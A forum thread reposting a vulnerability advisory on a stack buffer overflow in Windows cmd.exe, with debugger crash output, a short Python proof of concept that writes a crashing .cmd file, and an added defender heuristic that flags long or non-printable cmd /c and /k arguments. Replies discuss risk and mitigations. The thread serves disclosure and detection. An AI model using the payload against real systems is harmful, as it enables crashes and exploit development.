Windows cmd.exe overflow vulnerability
# Title: Microsoft Windows cmd.exe - Stack Buffer Overflow
# Author: John Page (aka hyp3rlinx)
# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt
# ISR: ApparitionSec
Vendor: www.microsoft.com
Product: cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems.
Vulnerability Type: Stack Buffer Overflow
CVE Reference: N/A
A specially crafted payload triggers a stack buffer overflow in the Windows NT "cmd.exe" command-line interpreter. Triggering it requires running an already dangerous file type such as .cmd or .bat; however, cmd.exe also accepts commands as a string via the /c and /k flags, and passing the payload that way triggers the same overflow condition.
E.g. cmd.exe /c <PAYLOAD>.
(660.12d4): Stack buffer overflow - code c0000409 (first/second chance not available)
ntdll!ZwWaitForMultipleObjects+0x14:
00007ffb`00a809d4 c3 ret
0:000> .ecxr
rax=0000000000000022 rbx=000002e34d796890 rcx=00007ff7c0e492c0
rdx=00007ff7c0e64534 rsi=000000000000200e rdi=000000000000200c
rip=00007ff7c0e214f8 rsp=000000f6a82ff0a0 rbp=000000f6a82ff1d0
r8=000000000000200c r9=00007ff7c0e60520 r10=0000000000000000
r11=0000000000000000 r12=000002e34d77a810 r13=0000000000000002
r14=000002e34d796890 r15=000000000000200d
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
cmd!StripQuotes+0xa8:
00007ff7`c0e214f8 cc int 3
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
Failed calling InternetOpenUrl, GLE=12029
FAULTING_IP:
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc int 3
EXCEPTION_RECORD:
ffffffffffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8)
ExceptionCode: c0000409 (Stack buffer overflow)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter: 0000000000000008
PROCESS_NAME: cmd.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_PARAMETER1: 0000000000000008
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
FAULTING_THREAD: 00000000000012d4
BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE
PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE
DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE
LAST_CONTROL_TRANSFER: from 00007ffafcfca9c6 to 00007ffb00a809d4
STACK_TEXT:
000000f6`a82fea38 00007ffa`fcfca9c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!ZwWaitForMultipleObjects+0x14
000000f6`a82fea40 00007ffa`fcfca8ae : 00000000`00000098 00000000`00000096 00000000`d000022d 00000000`d000022d : KERNELBASE!WaitForMultipleObjectsEx+0x106
000000f6`a82fed40 00007ffa`fe1d190e : 00000000`00000000 000000f6`a82ff1d0 00007ff7`c0e3e000 00007ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe
000000f6`a82fed80 00007ffa`fe1d150f : 00000000`00000000 00000000`00000000 00000000`00000003 00000000`00000001 : kernel32!WerpReportFaultInternal+0x3ce
000000f6`a82feea0 00007ffa`fd05976b : 00000000`00000000 000000f6`a82ff1d0 00000000`00000004 00000000`00000000 : kernel32!WerpReportFault+0x73
000000f6`a82feee0 00007ff7`c0e26b6a : 00007ff7`c0e3e000 00007ff7`c0e3e000 00000000`0000200e 00000000`0000200c : KERNELBASE!UnhandledExceptionFilter+0x35b
000000f6`a82feff0 00007ff7`c0e26df6 : 000002e3`00000000 00007ff7`c0e10000 000002e3`4d796890 00007ff7`c0e6602c : cmd!_raise_securityfailure+0x1a
000000f6`a82ff020 00007ff7`c0e214f8 : 000002e3`4d77a810 00000000`00000000 00000000`00000002 00000000`0000200e : cmd!_report_rangecheckfailure+0xf2
000000f6`a82ff0a0 00007ff7`c0e2096f : 00000000`0000200c 000000f6`a82ff1d0 000000f6`a82ff1d0 00000000`0000200e : cmd!StripQuotes+0xa8
000000f6`a82ff0d0 00007ff7`c0e239a9 : 000002e3`4d76ff90 000002e3`4d76ff90 00000000`00000000 000002e3`4d76ff90 : cmd!SearchForExecutable+0x443
000000f6`a82ff390 00007ff7`c0e1fb9e : 00000000`00000000 000002e3`4d76ff90 ffffffff`ffffffff 000002e3`4d990000 : cmd!ECWork+0x69
000000f6`a82ff600 00007ff7`c0e1ff35 : 00007ff7`c0e4fbb0 000002e3`4d76ff90 00000000`00000000 00000000`00000001 : cmd!FindFixAndRun+0x3de
000000f6`a82ffaa0 00007ff7`c0e2277e : 00000000`00000002 000000f6`a82ffbb0 00000000`00000000 00000000`00000002 : cmd!Dispatch+0xa5
000000f6`a82ffb30 00007ff7`c0e26a89 : 00000000`00000001 00000000`00000000 00007ff7`c0e3fd78 00000000`00000000 : cmd!main+0x1fa
000000f6`a82ffbd0 00007ffa`fe1e1fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : cmd!wil::details_abi::ProcessLocalStorage<wil::details_abi::ProcessLocalData>::~ProcessLocalStorage<wil::details_abi::ProcessLocalData>+0x289
000000f6`a82ffc10 00007ffb`00a4efc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
000000f6`a82ffc40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
FOLLOWUP_IP:
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc int 3
SYMBOL_STACK_INDEX: 8
SYMBOL_NAME: cmd!StripQuotes+a8
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: cmd
IMAGE_NAME: cmd.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 0
STACK_COMMAND: ~0s ; kb
FAILURE_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_cmd.exe!StripQuotes
BUCKET_ID: X64_APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE_MISSING_GSFRAME_cmd!StripQuotes+a8
PoC:
PAYLOAD = chr(235) + "\\CC"
PAYLOAD = PAYLOAD * 3000
with open("hate.cmd", "w") as f:
    f.write(PAYLOAD)
Network Access: Local
Video URL: https://www.youtube.com/watch?v=wYYgjV-PzD8
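A defender-side check, added here as an example and not part of the advisory or of any Microsoft code: a Python heuristic over process-creation records that flags cmd.exe invocations whose /c or /k argument is abnormally long or largely non-printable, the two properties of the payload the advisory describes. The record format, the ProcessId and CommandLine field names, the thresholds and the sample lines are all constructed assumptions for illustration.

```python
import re

# Thresholds are assumptions for illustration; calibrate them against a
# baseline of normal cmd.exe command lines in your own environment.
MAX_ARG_LEN = 2048             # /c or /k argument longer than this is unusual
MAX_NONPRINTABLE_RATIO = 0.05  # share of characters outside printable ASCII

# Matches an optional (possibly quoted) path ending in cmd or cmd.exe, then
# captures the rest of the command line for switch inspection.
_CMD_IMAGE_RE = re.compile(
    r'\s*"?(?:[^"\s]*[\\/])?cmd(?:\.exe)?"?\s+(.*)$', re.IGNORECASE | re.DOTALL)


def extract_cmd_argument(command_line):
    """Return (flag, argument) when command_line runs cmd.exe with /c or /k,
    otherwise None. Other switches that cmd accepts before /c or /k (such as
    /d, /q or /e:on) are skipped."""
    m = _CMD_IMAGE_RE.match(command_line)
    if not m:
        return None
    rest = m.group(1)
    while True:
        parts = rest.split(None, 1)
        if not parts:
            return None
        switch = parts[0].lower()
        remainder = parts[1] if len(parts) > 1 else ""
        if switch in ("/c", "/k"):
            return switch, remainder
        if switch.startswith("/"):
            rest = remainder
            continue
        return None


def assess(command_line):
    """Return the list of reasons a command line looks suspicious (empty when it
    is not a cmd.exe /c or /k invocation, or when nothing stands out)."""
    parsed = extract_cmd_argument(command_line)
    if parsed is None:
        return []
    flag, arg = parsed
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append(f"{flag} argument is {len(arg)} chars (> {MAX_ARG_LEN})")
    if arg:
        nonprintable = sum(1 for ch in arg if not 0x20 <= ord(ch) <= 0x7E)
        if nonprintable / len(arg) > MAX_NONPRINTABLE_RATIO:
            reasons.append(f"{nonprintable} of {len(arg)} chars are outside printable ASCII")
    return reasons


def scan_log(records):
    """records: one process-creation record per line, each carrying a
    ProcessId=... field and a trailing CommandLine=... field (a constructed
    format, not any specific product's schema). Returns the flagged records."""
    findings = []
    for record in records:
        cmd = re.search(r"CommandLine=(.*)$", record, re.DOTALL)
        if not cmd:
            continue
        reasons = assess(cmd.group(1))
        if reasons:
            pid = re.search(r"ProcessId=(\d+)", record)
            findings.append({"pid": pid.group(1) if pid else None, "reasons": reasons})
    return findings


# Constructed sample records. Record 4 carries the same shape of input as the
# advisory's PoC (chr(235) followed by "\CC", repeated 3000 times); record 5 is
# long but printable; the others are ordinary invocations.
SAMPLE_LOG = [
    "ProcessId=4120 CommandLine=cmd.exe /c dir C:\\Users",
    'ProcessId=4188 CommandLine="C:\\Windows\\System32\\cmd.exe" /d /k echo hello',
    "ProcessId=4201 CommandLine=powershell.exe -c Get-Process",
    "ProcessId=4312 CommandLine=cmd.exe /c " + (chr(235) + "\\CC") * 3000,
    "ProcessId=4350 CommandLine=cmd.exe /c " + "A" * 4096,
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"pid {finding['pid']}: " + "; ".join(finding["reasons"]))
```

Run stand-alone it reports records 4312 and 4350 and nothing else. In non-English locales legitimate command lines routinely contain non-ASCII characters, so the printable-ASCII ratio should be tuned or narrowed to control characters; the argument-length threshold is the more robust signal for this class of input.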
Re: Windows cmd.exe overflow vulnerability
Thanks for sharing this vulnerability information. cmd.exe is a critical Windows component, so a stack overflow in it certainly deserves attention. From the analysis, triggering it requires the user to actively run a malicious .cmd/.bat file or pass the payload via the /c parameter, so practical exploitation would probably have to be combined with other social-engineering tactics. Still, if defenders keep an eye out for suspicious command-line arguments or script invocations ahead of time, the risk should be reduced. Has Microsoft responded or announced plans to fix this?
Re: Windows cmd.exe overflow vulnerability
This vulnerability is analysed in good detail, thanks for sharing. It looks like a stack overflow caused by cmd.exe not strictly validating the input string length when handling the /c or /k parameters. Although it takes a .bat/.cmd file or directly passed arguments to trigger, once successfully exploited an attacker could gain control of the system. I would recommend avoiding batch scripts from unknown sources in daily use and following Microsoft's official security updates so patches are applied promptly. Also consider enabling the system's built-in mitigations such as DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization) to reduce the risk of exploitation.
Re: Windows cmd.exe overflow vulnerability
Thanks for sharing this vulnerability information. From the details, this is indeed a stack buffer overflow worth attention, especially since it can be triggered directly through the `/c` or `/k` parameters, which makes the attack surface relatively broad. However, there is no CVE number yet, and the affected range of Windows versions is not mentioned. Have you tested whether different Windows versions (such as Win10, Win11 or the Server series) are all affected? Also, while this kind of vulnerability first requires a dangerous file like .cmd/.bat or command-line execution rights, the risk is amplified when combined with social engineering or other exploits, so everyone should stay alert when receiving suspicious batch files. Looking forward to an official security update or more detailed mitigation advice.